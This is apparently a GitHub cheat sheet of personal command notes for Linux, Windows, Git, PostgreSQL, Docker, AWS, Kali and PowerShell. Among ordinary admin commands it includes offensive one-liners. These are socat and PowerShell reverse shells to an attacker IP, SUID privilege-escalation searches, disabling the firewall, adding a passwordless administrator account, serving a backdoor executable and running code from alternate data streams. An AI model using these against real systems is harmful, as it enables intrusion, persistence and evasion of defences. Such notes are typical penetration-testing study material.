-
Notifications
You must be signed in to change notification settings - Fork 39
Commands to resolve our problems or to facilitate our IT life :)
Table of Contents
Linux | Windows | Github | PostGreSQL | Docker | AWS | Kali | Python | Powershell
the next command allows us to see which network routes exist
ip route
getting more information about the network, connections from the endpoint
netstat -a: shows all listening ports and established connections.
netstat -at or netstat -au can also be used to list TCP or UDP protocols respectively.
netstat -l: list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list TCP ports
the next commands get the information about the SO
cat /proc/version
cat /etc/*release
uname -a
cat /etc/issue
get information about the process in an endpoint
ps
ps -A
ps axjf
getting variables information
env
get the current state of some variables of the system like CPU and RAM
top
it finds a file with its name
find / -name nombre
get the list of the ports used
netstat -lntu
print the memory ram used in our device
free -m
getting information about the memory and CPU
vmstat
and
top
print the list of users of a system
less /etc/passwd
find privileges
find / -perm -u=s -type f 2>/dev/null
The idea is to edit the next file when the program that you would like to use, in my case is "pico".
pico ~/.bashrc
you need to add on the final text the alias plus the command that you want to use
finally, execute the next line
. ~/.bashrc
The next command allows us to find the path of a specific file name
find -name "file name"
It turns off our own terminal echo, next it foregrounds the shell, thus completing the process.
stty raw -echo; fg
The idea is to configure the next "interfaces" with the parameters to out internet
sudo pico /etc/network/interfaces
Next, it restarts the interfaces in the SO
sudo /etc/init.d/networking restart
How do I verify if the interface are reachable
ip neigh show
Erase the information in a file text
truncate logfile --size 0
Generally commands... erase, move and copy files.
cp -a /source/. /dest/
rm -r [folder]/*
Looking to privileged things in order to scale them 🙈
find / -perm -4000 2> /dev/null | xargs ls
- Restart your password
The idea is to enter the recovery mode, just only use "shift" before the log screen. When you are there so let's use the next command
mount -n -o remount, rw /
Next, use the next command to restart the password according to the user.
passwd username_here
Take the DNS domain name and add it to /etc/hosts
echo IP spookysec.local >> /etc/hosts
Bind Shells
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
A fully stable Linux tty reverse shell.
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Socat encrypted shells
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
target or provider
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
client
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
Bind Shells
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
You can use netstat, with that insert the next code in order to list the process sorted by port
netstat -ano | findstr :8080
with the selected process to kill, write the next line
taskkill /PID typeID /F
The next command allows us to print the name and SID of a SAM in a windows computer (only in a cmd with root privileges)
wmic useraccount get name,sid
Getting the powershell from bash
powershell -ep bypass
This displays the status of the firewall
netsh firewall show opmode
This turns off firewall state for all the profiles
netsh advfirewall set allprofiles state off
Create a new user
New-LocalUser -Name "Mr.robot" -Description "Description of your new account." -NoPassword
Assign the new user to the administrator group
Add-LocalGroupMember -Group "Administrators" -Member "Mr.robot"
How know the list of repository associated to the .git.
git remote -v
Sometimes, it is necessary to save some local changes and update from the master repository in GitHub without to lose the job done, so, it is important first to commit the files that you need to save from the updating process.
git commit [some files]
next, update your local repository from the external changes.
git pull origin master
If you need to change the local email registered, write the next command.
git config --global user.email "you@example.com"
list all databases
\list or \l list all tables in the current database dt
connect to a databse
\connect database_name
execute a sql file in the posgrest environment
psql -f thefile.sql targetdatabase
if you want to delete all the tables in the same squema, so write the next code:
DROP SCHEMA public CASCADE;
To create a new schema:
CREATE SCHEMA public;
if you want to know the postgresql version installed in your environment
SELECT version();
see the view form
\d view
list the docker containers
docker ps
stop one container with its ID
docker stop container_id
get the docker container shell
sudo docker exec -i -t docker-id /bin/bash
erase everything
docker system prune
the next command allows us to list our buckets
aws s3 ls
This will determine if we're in a VM
run post/windows/gather/checkvm
The next command will check for various exploits which we can run within our session to elevate our privileges
run post/multi/recon/local_exploit_suggester
These are the commands that allow us to share a file using an apache server
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share/
chown -R www-data:www-data /var/www/html/share
service apache2 start
cp /root/Desktop/Backdoor.exe /var/www/html/share/
python -m http.server <port>
The next is a way to create a netcat shell using Python
python -c 'import pty;pty.spawn("/bin/bash")'
Get-FileHash -Algorithm MD5 file.txt
Getting information about the Alternate Data Streams (ADS), where ADS allows files to contain more than one stream of data
Get-Item -Path file.exe -Stream *
Getting a reverse shell netcat
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
wmic process call create $(Resolve-Path file.exe:streamname)